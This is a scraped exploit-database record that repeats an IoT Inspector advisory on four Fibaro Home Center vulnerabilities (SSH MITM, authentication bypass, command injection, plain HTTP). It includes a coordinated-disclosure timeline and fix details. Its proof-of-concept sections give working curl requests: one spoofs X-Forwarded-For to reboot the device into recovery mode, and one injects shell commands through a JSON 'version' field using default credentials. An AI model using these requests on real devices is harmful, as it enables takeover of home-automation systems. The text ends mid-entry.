Fibaro Home Center Light and Fibaro Home Center 2 versions 4.600 and below suffer from man-in-the-middle, missing authentication, remote command execution, and missing encryption vulnerabilities.
{"id": "1337DAY-ID-36122", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Fibaro Home Center MITM / Missing Authentication / Code Execution Vulnerabilities", "description": "Fibaro Home Center Light and Fibaro Home Center 2 versions 4.600 and below suffer from man-in-the-middle, missing authentication, remote command execution, and missing encryption vulnerabilities.", "published": "2021-04-20T00:00:00", "modified": "2021-04-20T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/36122", "reporter": "Marton Illes", "references": [], "cvelist": ["CVE-2021-20992", "CVE-2021-20991", "CVE-2021-20990", "CVE-2021-20989"], "immutableFields": [], "lastseen": "2021-12-27T13:50:11", "viewCount": 12, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20989", "CVE-2021-20990", "CVE-2021-20991", "CVE-2021-20992"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162243"]}], "rev": 4}, "score": {"value": 6.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "canvas", "idList": ["NGINX"]}, {"type": "cve", "idList": ["CVE-2021-20989", "CVE-2021-20990", "CVE-2021-20991", "CVE-2021-20992"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162243"]}]}, "exploitation": null, "vulnersScore": 6.9}, "sourceHref": "https://0day.today/exploit/36122", "sourceData": "Fibaro Home Center MITM / Missing Authentication / Code Execution\n\n\n\nVendor description:\n\n-------------------\n\n\"FIBARO is a global brand based on the Internet of Things technology. It \n\nprovides solutions for building and home automation. FIBARO's headquarters\n\nand factory are located in Wysogotowo, 3 miles away from Poznan. The company\n\nemploys app. 250 employees.\"\n\n \n\nhttps://www.fibaro.com/en/about-us/\n\n \n\n \n\nVulnerability overview/description:\n\n-----------------------------------\n\n1) Cloud SSH Connection Man-in-the-Middle Attack (CVE-2021-20989)\n\nHome Center devices initiate SSH connections to the Fibaro cloud to provide \n\nremote access and remote support capabilities. This connection can be \n\nintercepted using a man-in-the-middle attack and a device initiated remote \n\nport-forward channel can be used to connect to the web management interface.\n\n\nIoT Inspector identified a disabled SSH host key check, which enables \n\nman-in-the-middle attacks.\n\n \n\nBy initiating connections to the Fibaro cloud an attacker can eavesdrop on \n\ncommunication between the user and the device. As communication inside the \n\nSSH port-forward is not encrypted (see #4 on management interface), user \n\nsessions, tokens and passwords can be hijacked.\n\n \n\n2) Unauthenticated access to shutdown, reboot and reboot to recovery mode \n\n(CVE-2021-20990)\n\nAn internal management service is accessible on port 8000 and some API \n\nendpoints could be accessed without authentication to trigger a shutdown, a \n\nreboot, or a reboot into recovery mode. In recovery mode, an attacker can \n\nupload firmware without authentication. (Potentially an earlier version with\n\n\nknown remote command execution vulnerability, see #3)\n\n \n\n3) Authenticated remote command execution (versions before 4.550) \n\n(CVE-2021-20991)\n\nAn authenticated user can run commands as root user using a command\ninjection \n\nvulnerability.\n\nSimilar problems were also discovered by Pavel Cheremushkin from Kaspersky \n\nICS Cert: https://securelist.com/fibaro-smart-home/91416/\n\n \n\n4) Unencrypted management interface (CVE-2021-20992)\n\nHome Center devices provide a web based management interface over\nunencrypted \n\nHTTP protocol. Communication between the user and the device can be \n\neavesdropped to hijack sessions, tokens, and passwords. The management \n\ninterface is only available over HTTP on the local network. The vendor \n\nrecommends using the cloud-based management interface, which is accessible\nover \n\nHTTPS and requests are forwarded via an encrypted SSH connection between the\n\n\nFibaro cloud and the device.\n\n \n\n \n\nProof of concept:\n\n-----------------\n\n1) Cloud SSH Connection Man-in-the-Middle Attack\n\n \n\nHome Center devices initiate a SSH connection to the Fibaro cloud\n\n \n\n \n\n./etc/init.d/fibaro/RemoteAccess\n\n \n\n<snip>\n\nDAEMON=/usr/bin/ssh\n\n \n\n....\n\n \n\ncase \"$1\" in\n\n start)\n\n \n\n .....\n\n \n\n # get IP\n\n local\nGET_IP_URL=\"https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Seria\nl}&HW_Key=${HW_Key}\"\n\n local IP_Response; IP_Response=$(curl -f -s -S --retry 3\n--connect-timeout 100 --max-time 100 \"${GET_IP_URL}\" | tr -d '\n!\"#$%&|'\"'\"'|()*+,/:;<=>[email\u00a0protected][|\\\\|]|^`|\\||{}~')\n\n \n\n # get PORT\n\n local\nGET_PORT_URL=\"https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_S\nerial}&HW_Key=${HW_Key}\"\n\n local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3\n--connect-timeout 100 --max-time 100 \"${GET_PORT_URL}\" | tr -d '\n!\"#$%&|'\"'\"'|()*+,/:;<=>[email\u00a0protected][|\\\\|]|^`|\\||{}~')\n\n \n\n ....\n\n \n\n start-stop-daemon --start --background --pidfile \"${PIDFILE}\"\n--make-pidfile --startas /usr/bin/screen \\\n\n -- -DmS ${NAME} ${DAEMON} -y -K 30 -i\n/etc/dropbear/dropbear_rsa_host_key -R \"${PORT_Response}\":localhost:80\n[email\u00a0protected]\"${IP_Response}\"\n\n</snip>\n\n \n\nThe device uses dropbear ssh to initiate the connection; option -y disables\nany \n\nhost-key checks, voiding much of the otherwise added transport-layer\nsecurity \n\nby SSH: \"Always accept hostkeys if they are unknown.\"\n\n \n\nThe above \"get IP\" endpoint returns the address of the Fibaro cloud, e.g.: \n\nlb-1.eu.ra.fibaro.com\n\n \n\nAn attacker can use DNS spoofing or other means to intercept the connection.\nBy \n\nusing any hostkey, the attacker can successfully authenticate the SSH \n\nconnection. Once the connection is authenticated, the client initiates a\nremote \n\nport-forward:\n\n-R \"${PORT_Response}\":localhost:80\n\n \n\nThis enables the attacker to access port 80 (management interface) of the \n\ndevice.\n\n \n\nA similar problem exists for remote support connections:\n\n \n\n./opt/fibaro/scripts/remote-support.lua\n\n<snip>\n\nfunction handleResponse(response)\n\n responseJson = json.decode(response.data)\n\n print(json.encode(responseJson))\n\n \n\n local autoSSHCommand = 'ssh -y -K 30 -i\n/etc/dropbear/dropbear_rsa_host_key -R ' .. responseJson.private_ip.. ':'\n.. responseJson.port .. ':localhost:22 [email\u00a0protected]' .. responseJson.ip\n\n os.execute(autoSSHCommand)\n\nend\n\n \n\nfunction getSupportData()\n\n remoteUrl='https://dom.fibaro.com/get_support_route.php?PK_AccessPoint='\n.. serialNumber .. '&HW_Key=' .. HWKey\n\n print(remoteUrl)\n\n \n\n http = net.HTTPClient({timeout = 5000})\n\n \n\n http:request(remoteUrl, {\n\n options = {\n\n method = 'GET'\n\n },\n\n success = function(response)\n\n handleResponse(response)\n\n end,\n\n error = function(error)\n\n print(error)\n\n end\n\n })\n\nend\n\n \n\ngetSupportData()\n\n</snip>\n\n \n\nHere, the remote support endpoint returns the following data:\n\n{\"ip\":\"fwd-support.eu.ra.fibaro.com\",\"port\":\"XXXXX\",\"private_ip\":\"10.100.YYY\n.ZZZ\"}\n\n \n\nThe same dropbear ssh client is used with option -y. In this case, port 22 \n\n(ssh) is made accessible through the port-forward. However, the device only \n\nallows public key authentication with a hard-coded SSH key. No further\ntesting \n\nhas been done on compromising the support SSH connection.\n\n \n\n \n\n2) Unauthenticated access to shutdown, reboot and reboot to recovery mode\n\n \n\nThe device is running a nginx server, which forwards some requests to a \n\nlighttpd server (8000) for further processing:\n\n<snip>\n\n proxy_set_header X-Forwarded-For\n$proxy_add_x_forwarded_for;\n\n \n\n location ~* \\.php$ {\n\n proxy_pass http://127.0.0.1:8000;\n\n }\n\n \n\n location ~* \\.php\\?.* {\n\n proxy_pass http://127.0.0.1:8000;\n\n }\n\n</snip>\n\n \n\nThe lighttpd server is not only accessible locally, but also via the local \n\nnetwork.\n\n \n\nAuthentication and authorization is implemented in PHP and there is a\nspecial \n\ncheck for connections originating from within the host. However, when\nchecking \n\nthe remote IP address, the header X-Forwarded-For is also considered:\n\n \n\n./var/www/authorize.php\n\n<snip>\n\nfunction isLocalRequest()\n\n{\n\n $ipAddress = \"\";\n\n if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) \n\n $ipAddress = $_SERVER['HTTP_X_FORWARDED_FOR'];\n\n else\n\n $ipAddress = $_SERVER['REMOTE_ADDR'];\n\n \n\n $whitelist = array( '127.0.0.1', '::1' );\n\n if(in_array($ipAddress, $whitelist))\n\n return true;\n\n \n\n return false;\n\n}\n\n</snip>\n\n \n\nAs the lighttpd service available via the network, an attacked can inject\nthe \n\nrequired header X-Forwarded-For as well.\n\n \n\nThe check isLocalRequest is used to \"secure\" multiple endpoints:\n\n \n\n./var/www/services/system/shutdown.php\n\n<snip>\n\n<?php\n\n require_once(\"../../authorize.php\");\n\n \n\n if (!isLocalRequest() && !isAuthorized())\n\n {\n\n sendUnauthorized();\n\n }\n\n else\n\n {\n\n exec(\"systemShutdown\");\n\n }\n\n?>\n\n</snip>\n\n \n\n./var/www/services/system/reboot.php\n\n<snip>\n\n \n\nfunction authorize() \n\n{\n\n return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER,\nrole::INSTALLER));\n\n}\n\n \n\nfunction handlePOST($text)\n\n{\n\n if (!isLocalRequest() && !authorize())\n\n {\n\n sendUnauthorized();\n\n return;\n\n }\n\n \n\n $params = tryDecodeJson($text);\n\n if(!is_null($params) && isset($params->recovery) && $params->recovery\n=== true)\n\n exec(\"rebootToRecovery\");\n\n else\n\n exec(\"systemReboot\");\n\n}\n\n \n\n$requestBody = file_get_contents('php://input');\n\n$requestMethod = $_SERVER['REQUEST_METHOD'];\n\n \n\nif ($requestMethod == \"POST\") \n\n handlePOST($requestBody);\n\nelse \n\n setStatusMethodNotAllowed();\n\n \n\n</snip>\n\n \n\nAn attacker can issue the the following HTTP request to reboot the device\ninto \n\nrecovery mode:\n\ncurl -H 'X-Forwarded-For: 127.0.0.1' -H 'Content-Type: application/json' -d\n'{\"recovery\":true}' http://DEVICE:8000/services/system/reboot.php\n\n \n\nIn recovery mode, firmware images can be updated without authentication.\n\n \n\n \n\n3) Authenticated remote command execution (versions before 4.550)\n\n \n\nBackup & restore operations could be triggered though HTTP endpoints:\n\n \n\n./var/www/services/system/backups.php\n\n<snip>\n\nfunction restoreBackup($params)\n\n{\n\n if (getNumberOfInstances('{screen} SCREEN -dmS RESTORE') > 0)\n\n {\n\n setStatusTooManyRequests();\n\n return;\n\n }\n\n \n\n $type = $params->type;\n\n $id = $params->id;\n\n $version = $params->version;\n\n \n\n if (is_null($id) || !is_numeric($id) || $id < 1 ) \n\n {\n\n setStatusBadRequest();\n\n return;\n\n }\n\n \n\n $hcVersion = exec(\"cat /mnt/hw_data/serial | cut -c1-3\");\n\n \n\n if ($type == \"local\" && $hcVersion == \"HC2\" || $type == \"remote\") \n\n {\n\n $version ?\n\n exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '.\n$id . ' ' . $version) :\n\n exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '.\n$id);\n\n }\n\n else \n\n {\n\n setStatusBadRequest();\n\n return;\n\n }\n\n \n\n setStatusAccepted();\n\n}\n\n</snip>\n\n \n\nThe parameter $version is not sanitized or escaped, which allows an attacker\nto \n\ninject shell commands into the exec() call:\n\n \n\ncat > /tmp/exploit <<- EOM\n\n{\"action\": \"restore\", \"params\": {\"type\": \"remote\", \"id\": 1, \"version\": \"1;\nINJECTED COMMAND\"}}\n\nEOM\n\n \n\ncurl -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'content-type:\napplication/json' [email\u00a0protected]/tmp/exploit http://DEVICE/services/system/backups.php\n\n\n \n\nVersion 4.550 and later have proper escaping:\n\n<snip>\n\n $version = escapeshellarg($params->version);\n\n</snip>\n\n \n\n \n\n4) Unencrypted management interface\n\n \n\nNMMAP shows a few open ports on the box:\n\nPORT STATE SERVICE\n\n22/tcp open ssh\n\n80/tcp open http\n\n8000/tcp open http-alt\n\n \n\nBoth 80/tcp and 8000/tcp can be accessed over unencrypted HTTP.\n\n \n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nVulnerable / tested versions:\n\n-----------------------------\n\nVulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest\nversion \n\nat the time of the discovery\n\nVulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530\n\n \n\nSolution:\n\n---------\n\nUpgrade to the version 4.610 or latest version, which fixes vulnerabilities\n1, \n\n2 and 3.\n\n \n\nVulnerability 4 is not fixed as the vendor assumes that the local network is\n\n\ntrusted and the device only provides wired network access. Furthermore, the \n\nvendor recommends using the cloud-based management interface, which is \n\naccessible over HTTPS and requests are forwarded via an encrypted SSH \n\nconnection between the Fibaro cloud and the device.\n\n", "category": "remote exploits", "verified": true, "_state": {"dependencies": 1647589307, "score": 0}}
{"packetstorm": [{"lastseen": "2021-04-20T16:41:04", "description": "", "cvss3": {}, "published": "2021-04-20T00:00:00", "type": "packetstorm", "title": "Fibaro Home Center MITM / Missing Authentication / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-20989", "CVE-2021-20990", "CVE-2021-20991", "CVE-2021-20992"], "modified": "2021-04-20T00:00:00", "id": "PACKETSTORM:162243", "href": "https://packetstormsecurity.com/files/162243/Fibaro-Home-Center-MITM-Missing-Authentication-Code-Execution.html", "sourceData": "`IoT Inspector Research Lab Advisory IOT-20210408-0 \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n~~~ \n \ntitle: Multiple vulnerabilities \n \nvendor/product: Fibaro Home Center Light / Fibaro Home Center 2 \n \nhttps://www.fibaro.com/ \n \nvulnerable version: 4.600 and older \n \nfixed version: 4.610 \n \nCVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, \n \nCVE-2021-20992 \n \nimpact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H \n \n9.8 (critical) \nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H \n \n7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H \n \n8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H \n \nreported: 2020-11-18 \n \npublication: 2021-04-08 \n \nby: Marton Illes, IoT Inspector Research Lab \n \nhttps://www.iot-inspector.com/ \n \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n~~~ \n \n \n \nVendor description: \n \n------------------- \n \n\"FIBARO is a global brand based on the Internet of Things technology. It \n \nprovides solutions for building and home automation. FIBARO's headquarters \n \nand factory are located in Wysogotowo, 3 miles away from Poznan. The company \n \nemploys app. 250 employees.\" \n \n \n \nhttps://www.fibaro.com/en/about-us/ \n \n \n \n \n \nVulnerability overview/description: \n \n----------------------------------- \n \n1) Cloud SSH Connection Man-in-the-Middle Attack (CVE-2021-20989) \n \nHome Center devices initiate SSH connections to the Fibaro cloud to provide \n \nremote access and remote support capabilities. This connection can be \n \nintercepted using a man-in-the-middle attack and a device initiated remote \n \nport-forward channel can be used to connect to the web management interface. \n \n \nIoT Inspector identified a disabled SSH host key check, which enables \n \nman-in-the-middle attacks. \n \n \n \nBy initiating connections to the Fibaro cloud an attacker can eavesdrop on \n \ncommunication between the user and the device. As communication inside the \n \nSSH port-forward is not encrypted (see #4 on management interface), user \n \nsessions, tokens and passwords can be hijacked. \n \n \n \n2) Unauthenticated access to shutdown, reboot and reboot to recovery mode \n \n(CVE-2021-20990) \n \nAn internal management service is accessible on port 8000 and some API \n \nendpoints could be accessed without authentication to trigger a shutdown, a \n \nreboot, or a reboot into recovery mode. In recovery mode, an attacker can \n \nupload firmware without authentication. (Potentially an earlier version with \n \n \nknown remote command execution vulnerability, see #3) \n \n \n \n3) Authenticated remote command execution (versions before 4.550) \n \n(CVE-2021-20991) \n \nAn authenticated user can run commands as root user using a command \ninjection \n \nvulnerability. \n \nSimilar problems were also discovered by Pavel Cheremushkin from Kaspersky \n \nICS Cert: https://securelist.com/fibaro-smart-home/91416/ \n \n \n \n4) Unencrypted management interface (CVE-2021-20992) \n \nHome Center devices provide a web based management interface over \nunencrypted \n \nHTTP protocol. Communication between the user and the device can be \n \neavesdropped to hijack sessions, tokens, and passwords. The management \n \ninterface is only available over HTTP on the local network. The vendor \n \nrecommends using the cloud-based management interface, which is accessible \nover \n \nHTTPS and requests are forwarded via an encrypted SSH connection between the \n \n \nFibaro cloud and the device. \n \n \n \n \n \nProof of concept: \n \n----------------- \n \n1) Cloud SSH Connection Man-in-the-Middle Attack \n \n \n \nHome Center devices initiate a SSH connection to the Fibaro cloud \n \n \n \n \n \n./etc/init.d/fibaro/RemoteAccess \n \n \n \n<snip> \n \nDAEMON=/usr/bin/ssh \n \n \n \n.... \n \n \n \ncase \"$1\" in \n \nstart) \n \n \n \n..... \n \n \n \n# get IP \n \nlocal \nGET_IP_URL=\"https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Seria \nl}&HW_Key=${HW_Key}\" \n \nlocal IP_Response; IP_Response=$(curl -f -s -S --retry 3 \n--connect-timeout 100 --max-time 100 \"${GET_IP_URL}\" | tr -d ' \n!\"#$%&|'\"'\"'|()*+,/:;<=>?@[|\\\\|]|^`|\\||{}~') \n \n \n \n# get PORT \n \nlocal \nGET_PORT_URL=\"https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_S \nerial}&HW_Key=${HW_Key}\" \n \nlocal PORT_Response; PORT_Response=$(curl -f -s -S --retry 3 \n--connect-timeout 100 --max-time 100 \"${GET_PORT_URL}\" | tr -d ' \n!\"#$%&|'\"'\"'|()*+,/:;<=>?@[|\\\\|]|^`|\\||{}~') \n \n \n \n.... \n \n \n \nstart-stop-daemon --start --background --pidfile \"${PIDFILE}\" \n--make-pidfile --startas /usr/bin/screen \\ \n \n-- -DmS ${NAME} ${DAEMON} -y -K 30 -i \n/etc/dropbear/dropbear_rsa_host_key -R \"${PORT_Response}\":localhost:80 \nremote2@\"${IP_Response}\" \n \n</snip> \n \n \n \nThe device uses dropbear ssh to initiate the connection; option -y disables \nany \n \nhost-key checks, voiding much of the otherwise added transport-layer \nsecurity \n \nby SSH: \"Always accept hostkeys if they are unknown.\" \n \n \n \nThe above \"get IP\" endpoint returns the address of the Fibaro cloud, e.g.: \n \nlb-1.eu.ra.fibaro.com \n \n \n \nAn attacker can use DNS spoofing or other means to intercept the connection. \nBy \n \nusing any hostkey, the attacker can successfully authenticate the SSH \n \nconnection. Once the connection is authenticated, the client initiates a \nremote \n \nport-forward: \n \n-R \"${PORT_Response}\":localhost:80 \n \n \n \nThis enables the attacker to access port 80 (management interface) of the \n \ndevice. \n \n \n \nA similar problem exists for remote support connections: \n \n \n \n./opt/fibaro/scripts/remote-support.lua \n \n<snip> \n \nfunction handleResponse(response) \n \nresponseJson = json.decode(response.data) \n \nprint(json.encode(responseJson)) \n \n \n \nlocal autoSSHCommand = 'ssh -y -K 30 -i \n/etc/dropbear/dropbear_rsa_host_key -R ' .. responseJson.private_ip.. ':' \n.. responseJson.port .. ':localhost:22 remote2@' .. responseJson.ip \n \nos.execute(autoSSHCommand) \n \nend \n \n \n \nfunction getSupportData() \n \nremoteUrl='https://dom.fibaro.com/get_support_route.php?PK_AccessPoint=' \n.. serialNumber .. '&HW_Key=' .. HWKey \n \nprint(remoteUrl) \n \n \n \nhttp = net.HTTPClient({timeout = 5000}) \n \n \n \nhttp:request(remoteUrl, { \n \noptions = { \n \nmethod = 'GET' \n \n}, \n \nsuccess = function(response) \n \nhandleResponse(response) \n \nend, \n \nerror = function(error) \n \nprint(error) \n \nend \n \n}) \n \nend \n \n \n \ngetSupportData() \n \n</snip> \n \n \n \nHere, the remote support endpoint returns the following data: \n \n{\"ip\":\"fwd-support.eu.ra.fibaro.com\",\"port\":\"XXXXX\",\"private_ip\":\"10.100.YYY \n.ZZZ\"} \n \n \n \nThe same dropbear ssh client is used with option -y. In this case, port 22 \n \n(ssh) is made accessible through the port-forward. However, the device only \n \nallows public key authentication with a hard-coded SSH key. No further \ntesting \n \nhas been done on compromising the support SSH connection. \n \n \n \n \n \n2) Unauthenticated access to shutdown, reboot and reboot to recovery mode \n \n \n \nThe device is running a nginx server, which forwards some requests to a \n \nlighttpd server (8000) for further processing: \n \n<snip> \n \nproxy_set_header X-Forwarded-For \n$proxy_add_x_forwarded_for; \n \n \n \nlocation ~* \\.php$ { \n \nproxy_pass http://127.0.0.1:8000; \n \n} \n \n \n \nlocation ~* \\.php\\?.* { \n \nproxy_pass http://127.0.0.1:8000; \n \n} \n \n</snip> \n \n \n \nThe lighttpd server is not only accessible locally, but also via the local \n \nnetwork. \n \n \n \nAuthentication and authorization is implemented in PHP and there is a \nspecial \n \ncheck for connections originating from within the host. However, when \nchecking \n \nthe remote IP address, the header X-Forwarded-For is also considered: \n \n \n \n./var/www/authorize.php \n \n<snip> \n \nfunction isLocalRequest() \n \n{ \n \n$ipAddress = \"\"; \n \nif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) \n \n$ipAddress = $_SERVER['HTTP_X_FORWARDED_FOR']; \n \nelse \n \n$ipAddress = $_SERVER['REMOTE_ADDR']; \n \n \n \n$whitelist = array( '127.0.0.1', '::1' ); \n \nif(in_array($ipAddress, $whitelist)) \n \nreturn true; \n \n \n \nreturn false; \n \n} \n \n</snip> \n \n \n \nAs the lighttpd service available via the network, an attacked can inject \nthe \n \nrequired header X-Forwarded-For as well. \n \n \n \nThe check isLocalRequest is used to \"secure\" multiple endpoints: \n \n \n \n./var/www/services/system/shutdown.php \n \n<snip> \n \n<?php \n \nrequire_once(\"../../authorize.php\"); \n \n \n \nif (!isLocalRequest() && !isAuthorized()) \n \n{ \n \nsendUnauthorized(); \n \n} \n \nelse \n \n{ \n \nexec(\"systemShutdown\"); \n \n} \n \n?> \n \n</snip> \n \n \n \n./var/www/services/system/reboot.php \n \n<snip> \n \n \n \nfunction authorize() \n \n{ \n \nreturn isAuthorized() || isAuthorizedFibaroAuth(array(role::USER, \nrole::INSTALLER)); \n \n} \n \n \n \nfunction handlePOST($text) \n \n{ \n \nif (!isLocalRequest() && !authorize()) \n \n{ \n \nsendUnauthorized(); \n \nreturn; \n \n} \n \n \n \n$params = tryDecodeJson($text); \n \nif(!is_null($params) && isset($params->recovery) && $params->recovery \n=== true) \n \nexec(\"rebootToRecovery\"); \n \nelse \n \nexec(\"systemReboot\"); \n \n} \n \n \n \n$requestBody = file_get_contents('php://input'); \n \n$requestMethod = $_SERVER['REQUEST_METHOD']; \n \n \n \nif ($requestMethod == \"POST\") \n \nhandlePOST($requestBody); \n \nelse \n \nsetStatusMethodNotAllowed(); \n \n \n \n</snip> \n \n \n \nAn attacker can issue the the following HTTP request to reboot the device \ninto \n \nrecovery mode: \n \ncurl -H 'X-Forwarded-For: 127.0.0.1' -H 'Content-Type: application/json' -d \n'{\"recovery\":true}' http://DEVICE:8000/services/system/reboot.php \n \n \n \nIn recovery mode, firmware images can be updated without authentication. \n \n \n \n \n \n3) Authenticated remote command execution (versions before 4.550) \n \n \n \nBackup & restore operations could be triggered though HTTP endpoints: \n \n \n \n./var/www/services/system/backups.php \n \n<snip> \n \nfunction restoreBackup($params) \n \n{ \n \nif (getNumberOfInstances('{screen} SCREEN -dmS RESTORE') > 0) \n \n{ \n \nsetStatusTooManyRequests(); \n \nreturn; \n \n} \n \n \n \n$type = $params->type; \n \n$id = $params->id; \n \n$version = $params->version; \n \n \n \nif (is_null($id) || !is_numeric($id) || $id < 1 ) \n \n{ \n \nsetStatusBadRequest(); \n \nreturn; \n \n} \n \n \n \n$hcVersion = exec(\"cat /mnt/hw_data/serial | cut -c1-3\"); \n \n \n \nif ($type == \"local\" && $hcVersion == \"HC2\" || $type == \"remote\") \n \n{ \n \n$version ? \n \nexec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. \n$id . ' ' . $version) : \n \nexec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. \n$id); \n \n} \n \nelse \n \n{ \n \nsetStatusBadRequest(); \n \nreturn; \n \n} \n \n \n \nsetStatusAccepted(); \n \n} \n \n</snip> \n \n \n \nThe parameter $version is not sanitized or escaped, which allows an attacker \nto \n \ninject shell commands into the exec() call: \n \n \n \ncat > /tmp/exploit <<- EOM \n \n{\"action\": \"restore\", \"params\": {\"type\": \"remote\", \"id\": 1, \"version\": \"1; \nINJECTED COMMAND\"}} \n \nEOM \n \n \n \ncurl -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'content-type: \napplication/json' -d@/tmp/exploit http://DEVICE/services/system/backups.php \n \n \n \n \nVersion 4.550 and later have proper escaping: \n \n<snip> \n \n$version = escapeshellarg($params->version); \n \n</snip> \n \n \n \n \n \n4) Unencrypted management interface \n \n \n \nNMMAP shows a few open ports on the box: \n \nPORT STATE SERVICE \n \n22/tcp open ssh \n \n80/tcp open http \n \n8000/tcp open http-alt \n \n \n \nBoth 80/tcp and 8000/tcp can be accessed over unencrypted HTTP. \n \n \n \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n~~~ \n \n \n \nVulnerable / tested versions: \n \n----------------------------- \n \nVulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest \nversion \n \nat the time of the discovery \n \nVulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530 \n \n \n \nSolution: \n \n--------- \n \nUpgrade to the version 4.610 or latest version, which fixes vulnerabilities \n1, \n \n2 and 3. \n \n \n \nVulnerability 4 is not fixed as the vendor assumes that the local network is \n \n \ntrusted and the device only provides wired network access. Furthermore, the \n \nvendor recommends using the cloud-based management interface, which is \n \naccessible over HTTPS and requests are forwarded via an encrypted SSH \n \nconnection between the Fibaro cloud and the device. \n \n \n \n \n \nAdvisory URL: \n \n------------- \n \nhttps://www.iot-inspector.com/blog/advisory-fibaro-home-center/ \n \n \n \n \n \nVendor contact timeline: \n \n------------------------ \n \n2020-11-18: Contacting Fibaro through support@fibaro.com, \n \nsupport-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com \n \n2020-11-23: Contacting Fibaro on Facebook & LinkedIn, got response on \nLinkedIn \n \n2020-11-24: Adivsory sent to Fibaro by email \n \n2020-12-01: Fibaro confirmed the receipt of the advisory \n \n2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes \n \n2021-03-16: Fibaro beta release (4.601) with the fixes \n \n2021-03-24: Fibaro applies for CVE numbers \n \n2021-03-31: Fibaro GA release (4.610) with the fix \n \n2021-04-08: IoT Inspector Research Lab publishes advisory \n \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n~~~ \n \n \n \nThe IoT Inspector Research Lab is an integrated part of IoT Inspector. \n \n \n \nIoT Inspector is a platform for automated security analysis and compliance \n \nchecks of IoT firmware. Our mission is to secure the Internet of Things. In \n \norder to discover vulnerabilities and vulnerability patterns within IoT \ndevices \n \nand to further enhance automated identification that allows for scalable \n \ndetection within IoT Inspector, we conduct excessive security research in \nthe \n \narea of IoT. \n \n \n \nWhenever the IoT Inspector Research Lab discovers vulnerabilities in IoT \n \nfirmware, we aim to responsibly disclose relevant information to the vendor \n \nof the affected IoT device as well as the general public in a way that \n \nminimizes potential harm and encourages further security analyses of IoT \n \nsystems. \n \n \n \nYou can find our responsible disclosure policy here: \n \nhttps://www.iot-inspector.com/responsible-disclosure-policy/ \n \n \n \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n~~~ \n \n \n \nInterested in using IoT Inspector for your research or product? \n \n \n \nMail: research at iot-inspector dot com \n \nWeb: https://www.iot-inspector.com \n \nBlog: https://www.iot-inspector.com/blog/ \n \nTwitter: https://twitter.com/iotinspector \n \n \n \nEOF Marton Illes / @2021 \n \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162243/IOT-20210408-0.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T13:31:42", "description": "In Fibaro Home Center 2 and Lite devices in all versions provide a web based management interface over unencrypted HTTP protocol. Communication between the user and the device can be eavesdropped to hijack 